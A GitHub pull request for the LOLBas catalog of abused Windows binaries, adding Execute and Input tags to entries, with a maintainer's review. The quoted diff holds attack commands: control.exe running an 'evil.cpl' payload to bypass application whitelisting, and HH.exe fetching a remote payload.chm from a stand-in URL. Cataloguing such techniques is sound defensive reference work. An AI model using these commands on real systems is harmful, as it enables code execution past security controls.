Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pull request: Added Execute Tags to most of the LOLBas #405

Open
wants to merge 149 commits into
base: master
Choose a base branch
from

Conversation

hegusung
Copy link

Hi, I really like the Tags feature and wanted to add tags to see better what type of payload the LOLBas executes.

So I made a commit per LOLBas edited. If you want me to do just 1 big commit I will do another Pull Request

The following can be improved, please tell me if you want me to spend more time on this:

  • Every "execute" tag are under "Execute: TYPE". However some TYPE are not executed properly speaking (like INF file for exemple). We can just leave it like this or switch to :
    • Execute: TYPE for executed files (like EXE, DLL)
    • Input: TYPE for non executed files (like INF, SCT)
  • The current tagging system does not separate EXE payloads from EXE payloads where you can specify arguments. It might be interesting to separate those.

Anyway please tell me how you feel about this.
Regards,
Hegusung

Changed tags Execute DLL to Execute .NetDLL
Added Execute: .NetEXE tag
Tags added:
- .NetObjects
- Fixed Format
Added tags
- Execute: EXE
- Input: Custom Format
Added the following tags:
- Execute: EXE
- Input: Custom Format
Added tags:
- Execute: CMD
- Input: Custom format
Added Tags:
- Input: CustomFormat
Tags:
Changed Input: INF to Execute INF for consistency
Inout: Customformat added
Execute and Input Tags added
Added Execution section to Control.exe

Added tags:
- Input Custom Format
Added Input tag
Added Tags:
- Execute EXE
- Input Fixed Format
Added Tags:
- Execute ClickOnce
- Execute Remote
- Input Custom Format
Added Tags:
- Execute CMD
- Input CustomFormat
Added Tags:
- Execution: Remote
- Input: Custom Format
Added Tags:
- Execute EXE
- Input: Custom Format
Added Tags: 
- Input CustomFormat
Added Tags:
- Execute EXE
- Input: Custom Format
Added Tags:
Execute: EXE
Input: Fixed Format
Added Tags:
- Execute CMD
- Input Custom Format
Added Tags:
- Execute CMD
- Input Fixed Format
Added the command to execute remote CHM files
Added Tags
Added Tags:
Execute INF
Input: Fixed Format
Added Tags
Execute EXE
Input Fixed Format
Added Tags:
Execute .NetEXE
Execute Remote
Input Custom Format
Added:
Execute INF
Input Custom Format
Added Tags:
Input Custom Format
hegusung and others added 21 commits October 13, 2024 22:24
Added Tags:
Execute EXE
Execute Remote
Added Tags:
Execute Powershell
Added Tags:
Execute: Powershell
Added Tags:
Execute Nuget
Execute Remote
Added Tags:
Execute WSH
Added Tags:
- Execute: Javascript
Execute CMD
Added Tags:
Execute Nuget
Execute Remote
Execute EXE
Added Tags:
Execute EXE
Added Tags:
Execute EXE
Added Tags:
Execute .NetObjects
Added Tags:
Execute EXE
Execute Remote
Added Tags:
Execute: EXE
Added Tags
Execute EXE
Added Tags:
Execute C#
Added Tags:
Execute EXE
Execute CMD
@hegusung
Copy link
Author

Also, AWBypass and Execute sections are usually redundant. It could be interesting to add AWBypass as a tag rather than a section

@wietze wietze self-requested a review October 22, 2024 07:29
@wietze
Copy link
Member

wietze commented Oct 22, 2024

This is a nice idea, thank you for looking into this and opening a pull request.
I'll be adding a few suggestions but on the whole, this is a great contribution.

Copy link
Member

@wietze wietze left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I made a couple of small changes, see 089614e - let me know if you are happy with these, then I'll merge the entire PR. Thanks again for your work here, great stuff

Copy link
Member

@wietze wietze left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Also, two minor questions

Comment on lines +16 to +24
- Command: control.exe c:\windows\tasks\evil.cpl
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Where did this come from?

Comment on lines +27 to +37
- Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe
Category: Execute
Privileges: User
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: CHM
- Execute: Remote
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Same here

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants